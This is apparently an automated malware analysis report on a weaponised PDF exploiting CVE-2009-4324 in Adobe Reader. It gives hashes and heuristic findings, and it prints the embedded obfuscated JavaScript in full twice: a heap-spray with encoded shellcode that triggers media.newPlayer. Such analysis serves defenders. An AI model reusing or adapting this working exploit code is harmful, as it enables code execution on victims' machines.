Malicious PDF — malware analysis report

Static analysis result for SHA-256 3cd23751f3dc5f69…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2019-08-04
MD5: 053f9604f33942f6d5f2337225555245 SHA-1: c82ffedc67ae40c4cd72b51b3eaed558efd18254 SHA-256: 3cd23751f3dc5f697880869db2f19cb569ab9b9b8e646b7407254e64e38d2655
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript stream is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. No specific IOCs were extracted from the JavaScript or document body.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 2041 bytes
SHA-256: 5a51909ceb0d7d5fc390fc016ec6da3ef6fe557369d88e4428aa6d6d9126033e
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 4833 bytes
SHA-256: 67d16badf36b4d8c67c0c47adb9f01a2eaa60fa09fbb30364a16791a02d36c18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV=unescape;
var IKksdghdfda="dfodjffFFhsdeEEgsdnnvnVCOpUJH";
var UJNyhbTGVrfc =  PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x75\x61\x31\x36\x34\x25\x75\x30\x30\x33\x30\x25\x750000\x25\x750005\x25\x750004\x25\x758b00\x25\x75ebf8\x25\x755e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef"+
"%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%uac06%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f"+
"%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364"+
"%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10"+
"%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4"+
"%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87"+
"%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u5d06%u4328%u2cdd"+
"%u2ddd%u1145%u1124%u0d25%u851b%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64"+
"%uc68f%ub7ba%u926c%uefb7%u5d90%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0"+
"%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511"+
"%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u4307%u1011%u6410%u643f"+
"%u641a%u6411%u6c21%udf2e%u4007%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10"+
"%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf"+
"%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85"+
"%uef87%ueff0%u10ef%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7"+
"%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87"+
"%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2"+
"%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ua507"+
"%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e"+
"%u1010%u85b2%u85ef%u1010%uebba%u7f7f%uba7f%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013"+
"%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef"+
"%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64"+
"%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa"+
"%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f"+
"%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf"+
"%u10ef%uefca%uafcf");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858\x25\x756371%u717a%u7672%u626e%u626e\x25\x75455a%u4243%u6764%u7646\x25\x75696b%u6a6e%u4e61%u6c6d\x25\x757350\x25\x755168\x25\x757171\x25\x755574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 33500) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,33500 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
var OIYTfcdeERHnbCDSetjjkk="ETmnsdbfDSXvnkfkjhbDSsdFBb";
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x1000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}
var EYIjndbsfedfSDWvbsdbndjAkvp=util;
EYIjndbsfedfSDWvbsdbndjAkvp.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
EYIjndbsfedfSDWvbsdbndjAkvp.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
var fduiJgDRRecVJkopOiytFGH=this;
try {fduiJgDRRecVJkopOiytFGH.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
var QETYuijjGDSXcvBJIIOutfWQAsDFFGg=util;
QETYuijjGDSXcvBJIIOutfWQAsDFFGg.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
var WSXDREDcgtYHBNMNujiKEtyhfdVBNMNikJGResd="QRSFXCHVjhbKnGUFvhBmbKLJOLJNnFREdcsaXBJHIOiofd";
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 4631 bytes
SHA-256: 12472f8407165c40f4a229cea7b6f3a14affe4fcf487bfa659e6688aaca9b083
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 34 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV=unescape;
var IKksdghdfda="dfodjffFFhsdeEEgsdnnvnVCOpUJH";
var UJNyhbTGVrfc =  PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("%ua164%u0030%u0000%u0005%u0004%u8b00%uebf8%u5e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%uac06%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u5d06%u4328%u2cdd%u2ddd%u1145%u1124%u0d25%u851b%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c%uefb7%u5d90%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u4307%u1011%u6410%u643f%u641a%u6411%u6c21%udf2e%u4007%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85"+
"%uef87%ueff0%u10ef%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ua507%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef%u1010%uebba%u7f7f%uba7f%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef%uefca%uafcf");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858\x25\x756371%u717a%u7672%u626e%u626e\x25\x75455a%u4243%u6764%u7646\x25\x75696b%u6a6e%u4e61%u6c6d\x25\x757350\x25\x755168\x25\x757171\x25\x755574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 33500) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,33500 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
var OIYTfcdeERHnbCDSetjjkk="ETmnsdbfDSXvnkfkjhbDSsdFBb";
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x1000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}
var EYIjndbsfedfSDWvbsdbndjAkvp=util;
EYIjndbsfedfSDWvbsdbndjAkvp.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
EYIjndbsfedfSDWvbsdbndjAkvp.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
var fduiJgDRRecVJkopOiytFGH=this;
try {fduiJgDRRecVJkopOiytFGH.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
var QETYuijjGDSXcvBJIIOutfWQAsDFFGg=util;
QETYuijjGDSXcvBJIIOutfWQAsDFFGg.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
var WSXDREDcgtYHBNMNujiKEtyhfdVBNMNikJGResd="QRSFXCHVjhbKnGUFvhBmbKLJOLJNnFREdcsaXBJHIOiofd";

Open this report in the interactive analyzer, or submit your own file for analysis.